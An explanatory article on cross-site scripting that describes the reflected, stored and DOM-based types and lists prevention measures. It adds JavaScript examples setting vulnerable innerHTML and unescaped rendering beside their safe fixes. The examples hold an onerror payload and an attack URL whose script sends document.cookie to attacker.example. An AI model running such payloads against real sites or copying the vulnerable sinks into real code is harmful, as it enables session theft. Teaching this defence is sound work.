Firstly, it’s a very serious and very real attack vector; it sits at number 7 in the most recent OWASP Top 10. According to Symantec, as of 2007 it accounted for around 84% of all security vulnerabilities documented on web sites.
In short, XSS is where attacker-controlled script is injected into a web page that other people view. A browser parses the HTML (and the other languages embedded in it) to render the page, so if attacker-supplied text ends up being treated as part of that markup, the browser runs the injected script with the same origin and privileges as the site’s own code. This can lead to anything from annoying pop-up messages, to theft of cookies and credentials, to redirection to other websites.
Types of XSS
Reflected XSS
This is generally the least serious of the three because it is non-persistent. The injected code is not stored by the server; it usually travels as part of a URL (for example in a query parameter) in a link the victim is tricked into following. The vulnerability is that the server does not properly validate the URL and query, and echoes the value straight back into the page without escaping special characters. The result is that the code contained in the web address is reflected into the response and executed by the victim’s browser, not by the server.
Stored XSS
This is a serious threat and can have terrible consequences for a website and its users. The injected string and code is actually stored server-side (in a comment, a profile field, a forum post, a database record and so on). This means that every subsequent visitor to the affected page has the injected code run in their browser. They are unlikely to have any idea, as malicious code rarely displays anything; it blindly runs in the background.
DOM-based XSS
In this type of attack the malicious script never appears in the HTML the server sends. Instead the page’s own client-side JavaScript reads attacker-controlled data from the DOM and writes it back into the page unsafely. Common sources include document.URL, document.location (notably the URL fragment) and document.referrer; common sinks include innerHTML and document.write. Because the payload can sit entirely in the fragment, which browsers never send to the server, server-side filtering and logs may not see it at all.
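As an added example that is not part of the original post, here is the source-to-sink flow of a DOM-based XSS in plain browser JavaScript. The page is assumed to greet the user by a name carried in the URL fragment (for example a link ending in #name=Alice); the function names, the element and the attack payload are this example's own constructions. The small fake element at the end exists only so the code also runs outside a browser.

```javascript
// Added example (not from the original post): DOM-based XSS, source to sink.
// Assumed page: greets the user by a `name` parameter in the URL fragment.

// Source: read `name` out of the fragment. location.hash never leaves the
// browser (fragments are not included in HTTP requests), so no server-side
// validation or logging will ever see this value.
function nameFromHash(hash) {
  const params = new URLSearchParams(hash.replace(/^#/, ''));
  return params.get('name') || 'guest';
}

// Vulnerable sink: innerHTML parses the string as markup, so any tags in the
// name become live elements.
// In a browser: renderGreetingVulnerable(location.hash, document.getElementById('greeting'))
function renderGreetingVulnerable(hash, el) {
  el.innerHTML = 'Welcome back, ' + nameFromHash(hash) + '!';
}

// Safe sink: textContent inserts the string as text; nothing is parsed, so
// the angle brackets are displayed literally.
// In a browser: renderGreetingSafe(location.hash, document.getElementById('greeting'))
function renderGreetingSafe(hash, el) {
  el.textContent = 'Welcome back, ' + nameFromHash(hash) + '!';
}

// Constructed attacker fragment. A bare <script> tag would not fire here:
// browsers do not execute script elements inserted via innerHTML, which is
// why real DOM XSS payloads use an element with an event handler instead.
const ATTACK_HASH =
  '#name=' + encodeURIComponent('<img src=x onerror="alert(document.domain)">');

// Minimal stand-in for a DOM element so this file runs outside a browser.
// It has no parsing behaviour; it only records which property received
// the markup, which is the whole point of the comparison above.
function makeFakeElement() {
  return { innerHTML: '', textContent: '' };
}
```

The fix is not to filter the name harder but to stop handing untrusted text to a parsing sink: switching the assignment from innerHTML to textContent is the entire change. Where markup genuinely has to be built from user data, construct elements with createElement and set their text, rather than concatenating strings.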
How do I prevent this?
- Escape (encode) untrusted data for the context it is output into, so that characters such as < and > are rendered as text rather than parsed as markup. HTML body text, attribute values, URLs and JavaScript strings each need a different encoding
- Use a framework or templating engine that escapes output by default, and be careful with the places it lets you switch that off
- Validate input – a good mindset is to always assume the input is malicious. Validation is a second line of defence, not a replacement for output escaping
- Monitor your website, logs and files carefully. Regularly review databases and file integrity, and test your site, looking for odd and irregular activity
- Ask a friend to test your site for these vulnerabilities (probably best in a sandbox environment or on a mirrored site!)
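The following is an added example, not code from the original post, and it ties the reflected XSS description above to the first item of this prevention list. It renders a server-side search page two ways: once by interpolating the query parameter straight into the HTML, and once with output escaping applied. The function names (escapeHtml, renderSearchPageVulnerable, renderSearchPageSafe, containsActiveContent), the example hostnames and the attack URL are this example's own constructions, not from any framework.

```javascript
// Added example (not from the original post): a server-rendered search page,
// vulnerable and hardened. Runs in Node (the URL class is a standard global).

// Output encoding for HTML text and double-quoted attribute values. This is
// not input stripping: the original string is preserved and only its
// rendering is made inert, so a user can legitimately search for "<b>".
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Pull the `q` parameter out of the request URL (the base is only needed
// because request URLs are relative).
function getQuery(requestUrl) {
  return new URL(requestUrl, 'http://example.test').searchParams.get('q') || '';
}

// Vulnerable: the parameter goes straight into the HTML in two contexts,
// text and a double-quoted attribute. Whatever the attacker placed in the
// link is sent back in the response and parsed by the victim's browser.
function renderSearchPageVulnerable(requestUrl) {
  const q = getQuery(requestUrl);
  return `<h1>Results for ${q}</h1>\n<input name="q" value="${q}">`;
}

// Hardened: the same template, with every untrusted value escaped for the
// context it lands in. One encoder suffices here because the attribute is
// double-quoted; an unquoted attribute, a URL or a <script> block would each
// need their own encoding.
function renderSearchPageSafe(requestUrl) {
  const q = escapeHtml(getQuery(requestUrl));
  return `<h1>Results for ${q}</h1>\n<input name="q" value="${q}">`;
}

// Crude check used to compare the two renderings: does the page contain a
// <script> tag or an on*= event handler the developer did not write?
function containsActiveContent(html) {
  return /<script\b|\son\w+\s*=/i.test(html);
}

// Constructed attacker link. The leading "> closes the value attribute so the
// payload works in both contexts; the script exfiltrates document.cookie.
const ATTACK_URL = '/search?q=' + encodeURIComponent(
  '"><script>document.location="https://attacker.example/?c="+document.cookie</script>'
);

// Side-by-side renderings for a reader running this file directly.
function demo() {
  return {
    vulnerable: renderSearchPageVulnerable(ATTACK_URL),
    safe: renderSearchPageSafe(ATTACK_URL),
  };
}
```

Note where the escaping happens: at output time, on the way into the HTML, rather than on the way in at the request boundary. Escaping input on arrival breaks legitimate data and still leaves the page exposed whenever the same value is later written into a different context.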